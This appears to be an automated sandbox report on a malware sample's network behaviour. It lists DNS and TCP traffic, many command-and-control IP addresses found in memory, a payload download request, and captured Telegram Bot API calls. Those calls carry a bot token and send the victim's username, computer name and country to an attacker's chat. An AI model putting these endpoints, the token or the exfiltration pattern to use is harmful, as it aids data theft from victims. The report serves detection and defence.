JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown

DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194
Source: unknown	TCP traffic detected without corresponding DNS query: 82.147.85.194

Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /byte/@jokerbot880901.txt HTTP/1.1Host: 82.147.85.194Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://104.248.208.221:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.161.20.142:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://116.202.101.219:8080
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, hahahahaha.txt.18.dr	String found in binary or memory: http://127.0.0.1:6787/
Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9D5000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:6787/ing=no
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://129.151.109.160:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://144.126.132.141:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://149.88.44.159:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.26.128.6:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://18.228.80.130:80
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59
Source: vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/get
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/hkLYW_user
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/hkLYW_user%40468325_report.wsr
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:80802
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.142.58.127:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.142.58.127:80Pk
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.189.109.146:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://212.6.44.53:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://216.250.190.139:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.224.102.6:8001
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.248.176.37:180
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.61.136.13:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.61.136.52:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://66.42.56.128:80
Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://82.147.85
Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://82.147.85.194
Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://82.147.85.194/byte/
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: vkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.net
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line?fields=query
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1717594364.000000000785F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/i?
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01A44000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D17F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
